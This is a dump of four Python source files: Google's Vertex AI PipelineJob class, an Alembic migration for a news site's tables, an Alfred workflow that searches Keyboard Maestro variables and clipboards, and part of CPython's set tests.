ext | sha | content |
---|---|---|
py | 1a49ea7fea10b37bd17e2462c089faa410cf524a | # -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import time
import re
from typing import Any, Dict, List, Optional
from google.auth import credentials as auth_credentials
from google.cloud.aiplatform import base
from google.cloud.aiplatform import initializer
from google.cloud.aiplatform import utils
from google.cloud.aiplatform.utils import json_utils
from google.cloud.aiplatform.utils import pipeline_utils
from google.protobuf import json_format
from google.cloud.aiplatform.compat.types import (
pipeline_job_v1beta1 as gca_pipeline_job_v1beta1,
pipeline_state_v1beta1 as gca_pipeline_state_v1beta1,
)
_LOGGER = base.Logger(__name__)
_PIPELINE_COMPLETE_STATES = set(
[
gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_SUCCEEDED,
gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_FAILED,
gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_CANCELLED,
gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_PAUSED,
]
)
_PIPELINE_ERROR_STATES = set(
[gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_FAILED]
)
# Pattern for valid names used as a Vertex resource name.
_VALID_NAME_PATTERN = re.compile("^[a-z][-a-z0-9]{0,127}$")
def _get_current_time() -> datetime.datetime:
"""Gets the current timestamp."""
return datetime.datetime.now()
def _set_enable_caching_value(
pipeline_spec: Dict[str, Any], enable_caching: bool
) -> None:
"""Sets pipeline tasks caching options.
Args:
pipeline_spec (Dict[str, Any]):
Required. The dictionary of pipeline spec.
enable_caching (bool):
Required. Whether to enable caching.
"""
for component in [pipeline_spec["root"]] + list(
pipeline_spec["components"].values()
):
if "dag" in component:
for task in component["dag"]["tasks"].values():
task["cachingOptions"] = {"enableCache": enable_caching}
class PipelineJob(base.VertexAiResourceNounWithFutureManager):
client_class = utils.PipelineJobClientWithOverride
_is_client_prediction_client = False
_resource_noun = "pipelineJobs"
_delete_method = "delete_pipeline_job"
_getter_method = "get_pipeline_job"
_list_method = "list_pipeline_jobs"
def __init__(
self,
display_name: str,
template_path: str,
job_id: Optional[str] = None,
pipeline_root: Optional[str] = None,
parameter_values: Optional[Dict[str, Any]] = None,
enable_caching: Optional[bool] = None,
encryption_spec_key_name: Optional[str] = None,
labels: Optional[Dict[str, str]] = None,
credentials: Optional[auth_credentials.Credentials] = None,
project: Optional[str] = None,
location: Optional[str] = None,
):
"""Retrieves a PipelineJob resource and instantiates its
representation.
Args:
display_name (str):
Required. The user-defined name of this Pipeline.
template_path (str):
Required. The path of PipelineJob or PipelineSpec JSON file. It
can be a local path or a Google Cloud Storage URI.
Example: "gs://project.name"
job_id (str):
Optional. The unique ID of the job run.
If not specified, pipeline name + timestamp will be used.
pipeline_root (str):
Optional. The root of the pipeline outputs. Defaults to the staging bucket.
parameter_values (Dict[str, Any]):
Optional. The mapping from runtime parameter names to their values that
control the pipeline run.
enable_caching (bool):
Optional. Whether to turn on caching for the run.
If this is not set, defaults to the compile time settings, which
are True for all tasks by default, while users may specify
different caching options for individual tasks.
If this is set, the setting applies to all tasks in the pipeline.
Overrides the compile time settings.
encryption_spec_key_name (str):
Optional. The Cloud KMS resource identifier of the customer
managed encryption key used to protect the job. Has the
form:
``projects/my-project/locations/my-region/keyRings/my-kr/cryptoKeys/my-key``.
The key needs to be in the same region as where the compute
resource is created.
If this is set, then all
resources created by the PipelineJob will
be encrypted with the provided encryption key.
Overrides encryption_spec_key_name set in aiplatform.init.
labels (Dict[str,str]):
Optional. The user-defined metadata to organize the PipelineJob.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to create this PipelineJob.
Overrides credentials set in aiplatform.init.
project (str):
Optional. Project to retrieve PipelineJob from. If not set,
project set in aiplatform.init will be used.
location (str):
Optional. Location to create PipelineJob. If not set,
location set in aiplatform.init will be used.
Raises:
ValueError: If job_id or labels have incorrect format.
"""
utils.validate_display_name(display_name)
if labels:
utils.validate_labels(labels)
super().__init__(project=project, location=location, credentials=credentials)
self._parent = initializer.global_config.common_location_path(
project=project, location=location
)
pipeline_json = json_utils.load_json(
template_path, self.project, self.credentials
)
# Pipeline_json can be either PipelineJob or PipelineSpec.
if pipeline_json.get("pipelineSpec") is not None:
pipeline_job = pipeline_json
pipeline_root = (
pipeline_root
or pipeline_job["pipelineSpec"].get("defaultPipelineRoot")
or pipeline_job["runtimeConfig"].get("gcsOutputDirectory")
or initializer.global_config.staging_bucket
)
else:
pipeline_job = {
"pipelineSpec": pipeline_json,
"runtimeConfig": {},
}
pipeline_root = (
pipeline_root
or pipeline_job["pipelineSpec"].get("defaultPipelineRoot")
or initializer.global_config.staging_bucket
)
builder = pipeline_utils.PipelineRuntimeConfigBuilder.from_job_spec_json(
pipeline_job
)
builder.update_pipeline_root(pipeline_root)
builder.update_runtime_parameters(parameter_values)
runtime_config_dict = builder.build()
runtime_config = gca_pipeline_job_v1beta1.PipelineJob.RuntimeConfig()._pb
json_format.ParseDict(runtime_config_dict, runtime_config)
pipeline_name = pipeline_job["pipelineSpec"]["pipelineInfo"]["name"]
self.job_id = job_id or "{pipeline_name}-{timestamp}".format(
pipeline_name=re.sub("[^-0-9a-z]+", "-", pipeline_name.lower())
.lstrip("-")
.rstrip("-"),
timestamp=_get_current_time().strftime("%Y%m%d%H%M%S"),
)
if not _VALID_NAME_PATTERN.match(self.job_id):
raise ValueError(
"Generated job ID: {} is illegal as a Vertex pipelines job ID. "
"Expecting an ID following the regex pattern "
'"[a-z][-a-z0-9]{{0,127}}"'.format(job_id)
)
if enable_caching is not None:
_set_enable_caching_value(pipeline_job["pipelineSpec"], enable_caching)
self._gca_resource = gca_pipeline_job_v1beta1.PipelineJob(
display_name=display_name,
pipeline_spec=pipeline_job["pipelineSpec"],
labels=labels,
runtime_config=runtime_config,
encryption_spec=initializer.global_config.get_encryption_spec(
encryption_spec_key_name=encryption_spec_key_name
),
)
@base.optional_sync()
def run(
self,
service_account: Optional[str] = None,
network: Optional[str] = None,
sync: Optional[bool] = True,
) -> None:
"""Run this configured PipelineJob and monitor the job until completion.
Args:
service_account (str):
Optional. Specifies the service account for workload run-as account.
Users submitting jobs must have act-as permission on this run-as account.
network (str):
Optional. The full name of the Compute Engine network to which the job
should be peered. For example, projects/12345/global/networks/myVPC.
Private services access must already be configured for the network.
If left unspecified, the job is not peered with any network.
sync (bool):
Optional. Whether to execute this method synchronously. If False, this method will unblock and it will be executed in a concurrent Future.
"""
self.submit(service_account=service_account, network=network)
self._block_until_complete()
def submit(
self, service_account: Optional[str] = None, network: Optional[str] = None,
) -> None:
"""Run this configured PipelineJob.
Args:
service_account (str):
Optional. Specifies the service account for workload run-as account.
Users submitting jobs must have act-as permission on this run-as account.
network (str):
Optional. The full name of the Compute Engine network to which the job
should be peered. For example, projects/12345/global/networks/myVPC.
Private services access must already be configured for the network.
If left unspecified, the job is not peered with any network.
"""
if service_account:
self._gca_resource.service_account = service_account
if network:
self._gca_resource.network = network
_LOGGER.log_create_with_lro(self.__class__)
self._gca_resource = self.api_client.create_pipeline_job(
parent=self._parent,
pipeline_job=self._gca_resource,
pipeline_job_id=self.job_id,
)
_LOGGER.log_create_complete_with_getter(
self.__class__, self._gca_resource, "pipeline_job"
)
_LOGGER.info("View Pipeline Job:\n%s" % self._dashboard_uri())
def wait(self):
"""Wait for thie PipelineJob to complete."""
if self._latest_future is None:
self._block_until_complete()
else:
super().wait()
@property
def pipeline_spec(self):
return self._gca_resource.pipeline_spec
@property
def state(self) -> Optional[gca_pipeline_state_v1beta1.PipelineState]:
"""Current pipeline state."""
self._sync_gca_resource()
return self._gca_resource.state
@property
def has_failed(self) -> bool:
"""Returns True if pipeline has failed.
False otherwise.
"""
return (
self.state == gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_FAILED
)
def _dashboard_uri(self) -> str:
"""Helper method to compose the dashboard uri where pipeline can be
viewed."""
fields = utils.extract_fields_from_resource_name(self.resource_name)
url = f"https://console.cloud.google.com/vertex-ai/locations/{fields.location}/pipelines/runs/{fields.id}?project={fields.project}"
return url
def _block_until_complete(self):
"""Helper method to block and check on job until complete."""
# Used these numbers so failures surface fast
wait = 5 # start at five seconds
log_wait = 5
max_wait = 60 * 5 # 5 minute wait
multiplier = 2 # scale wait by 2 every iteration
previous_time = time.time()
while self.state not in _PIPELINE_COMPLETE_STATES:
current_time = time.time()
if current_time - previous_time >= log_wait:
_LOGGER.info(
"%s %s current state:\n%s"
% (
self.__class__.__name__,
self._gca_resource.name,
self._gca_resource.state,
)
)
log_wait = min(log_wait * multiplier, max_wait)
previous_time = current_time
time.sleep(wait)
# Error is only populated when the job state is
# JOB_STATE_FAILED or JOB_STATE_CANCELLED.
if self._gca_resource.state in _PIPELINE_ERROR_STATES:
raise RuntimeError("Job failed with:\n%s" % self._gca_resource.error)
else:
_LOGGER.log_action_completed_against_resource("run", "completed", self)
@classmethod
def get(
cls,
resource_name: str,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
) -> "PipelineJob":
"""Get a Vertex AI Pipeline Job for the given resource_name.
Args:
resource_name (str):
Required. A fully-qualified resource name or ID.
project (str):
Optional. Project to retrieve PipelineJob from. If not set, project
set in aiplatform.init will be used.
location (str):
Optional. Location to retrieve PipelineJob from. If not set,
location set in aiplatform.init will be used.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to retrieve this PipelineJob.
Overrides credentials set in aiplatform.init.
Returns:
A Vertex AI PipelineJob.
"""
self = cls._empty_constructor(
project=project,
location=location,
credentials=credentials,
resource_name=resource_name,
)
self._gca_resource = self._get_gca_resource(resource_name=resource_name)
return self
def cancel(self) -> None:
"""Starts asynchronous cancellation on the PipelineJob. The server
makes a best effort to cancel the job, but success is not guaranteed.
On successful cancellation, the PipelineJob is not deleted; instead it
becomes a job with state set to `CANCELLED`.
"""
self.api_client.cancel_pipeline_job(name=self.resource_name)
@classmethod
def list(
cls,
filter: Optional[str] = None,
order_by: Optional[str] = None,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
) -> List["PipelineJob"]:
"""List all instances of this PipelineJob resource.
Example Usage:
aiplatform.PipelineJob.list(
filter='display_name="experiment_a27"',
order_by='create_time desc'
)
Args:
filter (str):
Optional. An expression for filtering the results of the request.
For field names both snake_case and camelCase are supported.
order_by (str):
Optional. A comma-separated list of fields to order by, sorted in
ascending order. Use "desc" after a field name for descending.
Supported fields: `display_name`, `create_time`, `update_time`
project (str):
Optional. Project to retrieve list from. If not set, project
set in aiplatform.init will be used.
location (str):
Optional. Location to retrieve list from. If not set, location
set in aiplatform.init will be used.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to retrieve list. Overrides
credentials set in aiplatform.init.
Returns:
List[PipelineJob] - A list of PipelineJob resource objects
"""
return cls._list_with_local_order(
filter=filter,
order_by=order_by,
project=project,
location=location,
credentials=credentials,
)
def wait_for_resource_creation(self) -> None:
"""Waits until resource has been created."""
self._wait_for_resource_creation()
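# Hypothetical usage sketch (not part of the original module); the project,
# bucket and parameter names below are placeholders:
#
#   from google.cloud import aiplatform
#
#   aiplatform.init(project="my-project", location="us-central1")
#   job = aiplatform.PipelineJob(
#       display_name="my-pipeline",
#       template_path="gs://my-bucket/pipeline_spec.json",
#       pipeline_root="gs://my-bucket/pipeline-root",
#       parameter_values={"learning_rate": 0.01},
#       enable_caching=False,
#   )
#   job.submit()          # create the job without blocking
#   # job.run(sync=True)  # alternatively, create and wait for completion
#   print(job.state)      # poll the current pipeline state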
|
py | 1a49ea86ffae726380eb4ac0ca3ef832c01ae2f1 | """initial
Revision ID: ca4351944ed4
Revises:
Create Date: 2018-12-16 17:28:04.537922
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ca4351944ed4'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('info_category',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=64), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('info_user',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('nick_name', sa.String(length=32), nullable=False),
sa.Column('password_hash', sa.String(length=128), nullable=False),
sa.Column('mobile', sa.String(length=11), nullable=False),
sa.Column('avatar_url', sa.String(length=256), nullable=True),
sa.Column('last_login', sa.DateTime(), nullable=True),
sa.Column('is_admin', sa.Boolean(), nullable=True),
sa.Column('signature', sa.String(length=512), nullable=True),
sa.Column('gender', sa.Enum('MAN', 'WOMAN'), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('mobile'),
sa.UniqueConstraint('nick_name')
)
op.create_table('info_news',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title', sa.String(length=256), nullable=False),
sa.Column('source', sa.String(length=64), nullable=False),
sa.Column('digest', sa.String(length=512), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('clicks', sa.Integer(), nullable=True),
sa.Column('comments_count', sa.Integer(), nullable=True),
sa.Column('index_image_url', sa.String(length=256), nullable=True),
sa.Column('category_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('status', sa.Integer(), nullable=True),
sa.Column('reason', sa.String(length=256), nullable=True),
sa.ForeignKeyConstraint(['category_id'], ['info_category.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('info_user_fans',
sa.Column('follower_id', sa.Integer(), nullable=False),
sa.Column('followed_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['followed_id'], ['info_user.id'], ),
sa.ForeignKeyConstraint(['follower_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('follower_id', 'followed_id')
)
op.create_table('info_comment',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('news_id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('parent_id', sa.Integer(), nullable=True),
sa.Column('like_count', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['news_id'], ['info_news.id'], ),
sa.ForeignKeyConstraint(['parent_id'], ['info_comment.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('info_user_collection',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('news_id', sa.Integer(), nullable=False),
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['news_id'], ['info_news.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('user_id', 'news_id')
)
op.create_table('info_comment_like',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('comment_id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['comment_id'], ['info_comment.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('comment_id', 'user_id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('info_comment_like')
op.drop_table('info_user_collection')
op.drop_table('info_comment')
op.drop_table('info_user_fans')
op.drop_table('info_news')
op.drop_table('info_user')
op.drop_table('info_category')
# ### end Alembic commands ###
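# Typical command-line usage (assumed Alembic environment; not part of the
# generated migration):
#
#   alembic upgrade head     # create all info_* tables via upgrade()
#   alembic downgrade -1     # drop them again via downgrade()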
|
py | 1a49eb33533c9be3b8c7176feff0f77d72f9d56a | #!/usr/bin/python
# encoding: utf-8
from __future__ import unicode_literals
import os
import argparse
import plistlib
import sys
import sqlite3
from sqlite3 import Error
from workflow import Workflow3, ICON_INFO, ICON_WARNING, ICON_ERROR
KM_APP_SUPPORT = os.path.expanduser("~/Library/Application Support/Keyboard Maestro/")
KM_APP_RESOURCES = "/System/Volumes/Data/Applications/Keyboard Maestro.app/Contents/Resources/"
VARS_DB = KM_APP_SUPPORT + "Keyboard Maestro Variables.sqlite"
CLIPS_PLIST = KM_APP_SUPPORT + "Keyboard Maestro Clipboards.plist"
ICON_KM_VAR = KM_APP_RESOURCES + "Variable.icns"
ICON_KM_CLIP = KM_APP_RESOURCES + "ClipboardIcon.icns"
wf = None
log = None
# noinspection PyProtectedMember
def main(wf):
parser = argparse.ArgumentParser()
parser.add_argument('-v', dest='vars', action='store_true')
parser.add_argument('-c', dest='clips', action='store_true')
parser.add_argument('query', nargs='?', default=None)
args = parser.parse_args(wf.args)
if args.vars:
sql = "SELECT name, value FROM variables WHERE value IS NOT '%Delete%';"
# create a database connection
conn = create_connection(VARS_DB)
with conn:
log.info("query: " + sql)
cur = conn.cursor()
cur.execute(sql)
rows = cur.fetchall()
for row in rows:
name = row[0]
value = row[1]
if len(value) < 100:
sub = value
else:
sub = 'press ↩︎ to view in window'
it = wf.add_item(uid=value,
title=name,
subtitle=sub,
arg=[name,value],
autocomplete=name,
valid=True,
icon=ICON_KM_VAR,
icontype="filepath",
quicklookurl=value)
it.add_modifier('cmd', subtitle="delete '" + name + "'", arg=[name,value], valid=True)
elif args.clips:
clips_pl = plistlib.readPlist(CLIPS_PLIST)
for clip in clips_pl:
name = clip['Name']
uid = clip['UID']
it = wf.add_item(uid=uid,
title=name,
subtitle='press ↩︎ to view',
arg=[name, uid],
autocomplete=name,
valid=True,
icon=ICON_KM_CLIP,
icontype="filepath",
quicklookurl=ICON_KM_CLIP)
if len(wf._items) == 0:
wf.add_item('No items found', icon=ICON_WARNING)
wf.send_feedback()
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by the db_file
:param db_file: database file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db_file)
except Error as e:
print(e)
return conn
if __name__ == '__main__':
wf = Workflow3()
log = wf.logger
sys.exit(wf.run(main))
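# Hypothetical Alfred Script Filter invocation (the script file name is a
# placeholder; Alfred supplies the user's query as the trailing argument):
#
#   /usr/bin/python km_search.py -v "{query}"   # search Keyboard Maestro variables
#   /usr/bin/python km_search.py -c "{query}"   # search Keyboard Maestro clipboards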
|
py | 1a49edf23110ab02e76014afeda238205f75dd34 | import unittest
from test import support
import gc
import weakref
import operator
import copy
import pickle
from random import randrange, shuffle
import sys
import warnings
import collections
import collections.abc
class PassThru(Exception):
pass
def check_pass_thru():
raise PassThru
yield 1
class BadCmp:
def __hash__(self):
return 1
def __eq__(self, other):
raise RuntimeError
class ReprWrapper:
'Used to test self-referential repr() calls'
def __repr__(self):
return repr(self.value)
class HashCountingInt(int):
'int-like object that counts the number of times __hash__ is called'
def __init__(self, *args):
self.hash_count = 0
def __hash__(self):
self.hash_count += 1
return int.__hash__(self)
class TestJointOps:
# Tests common to both set and frozenset
def setUp(self):
self.word = word = 'simsalabim'
self.otherword = 'madagascar'
self.letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
self.s = self.thetype(word)
self.d = dict.fromkeys(word)
def test_new_or_init(self):
self.assertRaises(TypeError, self.thetype, [], 2)
self.assertRaises(TypeError, set().__init__, a=1)
def test_uniquification(self):
actual = sorted(self.s)
expected = sorted(self.d)
self.assertEqual(actual, expected)
self.assertRaises(PassThru, self.thetype, check_pass_thru())
self.assertRaises(TypeError, self.thetype, [[]])
def test_len(self):
self.assertEqual(len(self.s), len(self.d))
def test_contains(self):
for c in self.letters:
self.assertEqual(c in self.s, c in self.d)
self.assertRaises(TypeError, self.s.__contains__, [[]])
s = self.thetype([frozenset(self.letters)])
self.assertIn(self.thetype(self.letters), s)
def test_union(self):
u = self.s.union(self.otherword)
for c in self.letters:
self.assertEqual(c in u, c in self.d or c in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(u), self.basetype)
self.assertRaises(PassThru, self.s.union, check_pass_thru())
self.assertRaises(TypeError, self.s.union, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').union(C('cdc')), set('abcd'))
self.assertEqual(self.thetype('abcba').union(C('efgfe')), set('abcefg'))
self.assertEqual(self.thetype('abcba').union(C('ccb')), set('abc'))
self.assertEqual(self.thetype('abcba').union(C('ef')), set('abcef'))
self.assertEqual(self.thetype('abcba').union(C('ef'), C('fg')), set('abcefg'))
# Issue #6573
x = self.thetype()
self.assertEqual(x.union(set([1]), x, set([2])), self.thetype([1, 2]))
def test_or(self):
i = self.s.union(self.otherword)
self.assertEqual(self.s | set(self.otherword), i)
self.assertEqual(self.s | frozenset(self.otherword), i)
try:
self.s | self.otherword
except TypeError:
pass
else:
self.fail("s|t did not screen-out general iterables")
def test_intersection(self):
i = self.s.intersection(self.otherword)
for c in self.letters:
self.assertEqual(c in i, c in self.d and c in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.intersection, check_pass_thru())
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').intersection(C('cdc')), set('cc'))
self.assertEqual(self.thetype('abcba').intersection(C('efgfe')), set(''))
self.assertEqual(self.thetype('abcba').intersection(C('ccb')), set('bc'))
self.assertEqual(self.thetype('abcba').intersection(C('ef')), set(''))
self.assertEqual(self.thetype('abcba').intersection(C('cbcf'), C('bag')), set('b'))
s = self.thetype('abcba')
z = s.intersection()
if self.thetype == frozenset:
self.assertEqual(id(s), id(z))
else:
self.assertNotEqual(id(s), id(z))
def test_isdisjoint(self):
def f(s1, s2):
'Pure python equivalent of isdisjoint()'
return not set(s1).intersection(s2)
for larg in '', 'a', 'ab', 'abc', 'ababac', 'cdc', 'cc', 'efgfe', 'ccb', 'ef':
s1 = self.thetype(larg)
for rarg in '', 'a', 'ab', 'abc', 'ababac', 'cdc', 'cc', 'efgfe', 'ccb', 'ef':
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s2 = C(rarg)
actual = s1.isdisjoint(s2)
expected = f(s1, s2)
self.assertEqual(actual, expected)
self.assertTrue(actual is True or actual is False)
def test_and(self):
i = self.s.intersection(self.otherword)
self.assertEqual(self.s & set(self.otherword), i)
self.assertEqual(self.s & frozenset(self.otherword), i)
try:
self.s & self.otherword
except TypeError:
pass
else:
self.fail("s&t did not screen-out general iterables")
def test_difference(self):
i = self.s.difference(self.otherword)
for c in self.letters:
self.assertEqual(c in i, c in self.d and c not in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.difference, check_pass_thru())
self.assertRaises(TypeError, self.s.difference, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').difference(C('cdc')), set('ab'))
self.assertEqual(self.thetype('abcba').difference(C('efgfe')), set('abc'))
self.assertEqual(self.thetype('abcba').difference(C('ccb')), set('a'))
self.assertEqual(self.thetype('abcba').difference(C('ef')), set('abc'))
self.assertEqual(self.thetype('abcba').difference(), set('abc'))
self.assertEqual(self.thetype('abcba').difference(C('a'), C('b')), set('c'))
def test_sub(self):
i = self.s.difference(self.otherword)
self.assertEqual(self.s - set(self.otherword), i)
self.assertEqual(self.s - frozenset(self.otherword), i)
try:
self.s - self.otherword
except TypeError:
pass
else:
self.fail("s-t did not screen-out general iterables")
def test_symmetric_difference(self):
i = self.s.symmetric_difference(self.otherword)
for c in self.letters:
self.assertEqual(c in i, (c in self.d) ^ (c in self.otherword))
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.symmetric_difference, check_pass_thru())
self.assertRaises(TypeError, self.s.symmetric_difference, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').symmetric_difference(C('cdc')), set('abd'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('efgfe')), set('abcefg'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('ccb')), set('a'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('ef')), set('abcef'))
def test_xor(self):
i = self.s.symmetric_difference(self.otherword)
self.assertEqual(self.s ^ set(self.otherword), i)
self.assertEqual(self.s ^ frozenset(self.otherword), i)
try:
self.s ^ self.otherword
except TypeError:
pass
else:
self.fail("s^t did not screen-out general iterables")
def test_equality(self):
self.assertEqual(self.s, set(self.word))
self.assertEqual(self.s, frozenset(self.word))
self.assertEqual(self.s == self.word, False)
self.assertNotEqual(self.s, set(self.otherword))
self.assertNotEqual(self.s, frozenset(self.otherword))
self.assertEqual(self.s != self.word, True)
def test_setOfFrozensets(self):
t = map(frozenset, ['abcdef', 'bcd', 'bdcb', 'fed', 'fedccba'])
s = self.thetype(t)
self.assertEqual(len(s), 3)
def test_sub_and_super(self):
p, q, r = map(self.thetype, ['ab', 'abcde', 'def'])
self.assertTrue(p < q)
self.assertTrue(p <= q)
self.assertTrue(q <= q)
self.assertTrue(q > p)
self.assertTrue(q >= p)
self.assertFalse(q < r)
self.assertFalse(q <= r)
self.assertFalse(q > r)
self.assertFalse(q >= r)
self.assertTrue(set('a').issubset('abc'))
self.assertTrue(set('abc').issuperset('a'))
self.assertFalse(set('a').issubset('cbs'))
self.assertFalse(set('cbs').issuperset('a'))
def test_pickling(self):
for i in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(self.s, i)
dup = pickle.loads(p)
self.assertEqual(self.s, dup, "%s != %s" % (self.s, dup))
if type(self.s) not in (set, frozenset):
self.s.x = 10
p = pickle.dumps(self.s, i)
dup = pickle.loads(p)
self.assertEqual(self.s.x, dup.x)
def test_iterator_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
itorg = iter(self.s)
data = self.thetype(self.s)
d = pickle.dumps(itorg, proto)
it = pickle.loads(d)
# Set iterators unpickle as list iterators due to the
# undefined order of set items.
# self.assertEqual(type(itorg), type(it))
self.assertIsInstance(it, collections.abc.Iterator)
self.assertEqual(self.thetype(it), data)
it = pickle.loads(d)
try:
drop = next(it)
except StopIteration:
continue
d = pickle.dumps(it, proto)
it = pickle.loads(d)
self.assertEqual(self.thetype(it), data - self.thetype((drop,)))
def test_deepcopy(self):
class Tracer:
def __init__(self, value):
self.value = value
def __hash__(self):
return self.value
def __deepcopy__(self, memo=None):
return Tracer(self.value + 1)
t = Tracer(10)
s = self.thetype([t])
dup = copy.deepcopy(s)
self.assertNotEqual(id(s), id(dup))
for elem in dup:
newt = elem
self.assertNotEqual(id(t), id(newt))
self.assertEqual(t.value + 1, newt.value)
def test_gc(self):
# Create a nest of cycles to exercise overall ref count check
class A:
pass
s = set(A() for i in range(1000))
for elem in s:
elem.cycle = s
elem.sub = elem
elem.set = set([elem])
def test_subclass_with_custom_hash(self):
# Bug #1257731
class H(self.thetype):
def __hash__(self):
return int(id(self) & 0x7fffffff)
s=H()
f=set()
f.add(s)
self.assertIn(s, f)
f.remove(s)
f.add(s)
f.discard(s)
def test_badcmp(self):
s = self.thetype([BadCmp()])
# Detect comparison errors during insertion and lookup
self.assertRaises(RuntimeError, self.thetype, [BadCmp(), BadCmp()])
self.assertRaises(RuntimeError, s.__contains__, BadCmp())
# Detect errors during mutating operations
if hasattr(s, 'add'):
self.assertRaises(RuntimeError, s.add, BadCmp())
self.assertRaises(RuntimeError, s.discard, BadCmp())
self.assertRaises(RuntimeError, s.remove, BadCmp())
def test_cyclical_repr(self):
w = ReprWrapper()
s = self.thetype([w])
w.value = s
if self.thetype == set:
self.assertEqual(repr(s), '{set(...)}')
else:
name = repr(s).partition('(')[0] # strip class name
self.assertEqual(repr(s), '%s({%s(...)})' % (name, name))
def test_cyclical_print(self):
w = ReprWrapper()
s = self.thetype([w])
w.value = s
fo = open(support.TESTFN, "w")
try:
fo.write(str(s))
fo.close()
fo = open(support.TESTFN, "r")
self.assertEqual(fo.read(), repr(s))
finally:
fo.close()
support.unlink(support.TESTFN)
def test_do_not_rehash_dict_keys(self):
n = 10
d = dict.fromkeys(map(HashCountingInt, range(n)))
self.assertEqual(sum(elem.hash_count for elem in d), n)
s = self.thetype(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
s.difference(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
if hasattr(s, 'symmetric_difference_update'):
s.symmetric_difference_update(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
d2 = dict.fromkeys(set(d))
self.assertEqual(sum(elem.hash_count for elem in d), n)
d3 = dict.fromkeys(frozenset(d))
self.assertEqual(sum(elem.hash_count for elem in d), n)
d3 = dict.fromkeys(frozenset(d), 123)
self.assertEqual(sum(elem.hash_count for elem in d), n)
self.assertEqual(d3, dict.fromkeys(d, 123))
def test_container_iterator(self):
# Bug #3680: tp_traverse was not implemented for set iterator object
class C(object):
pass
obj = C()
ref = weakref.ref(obj)
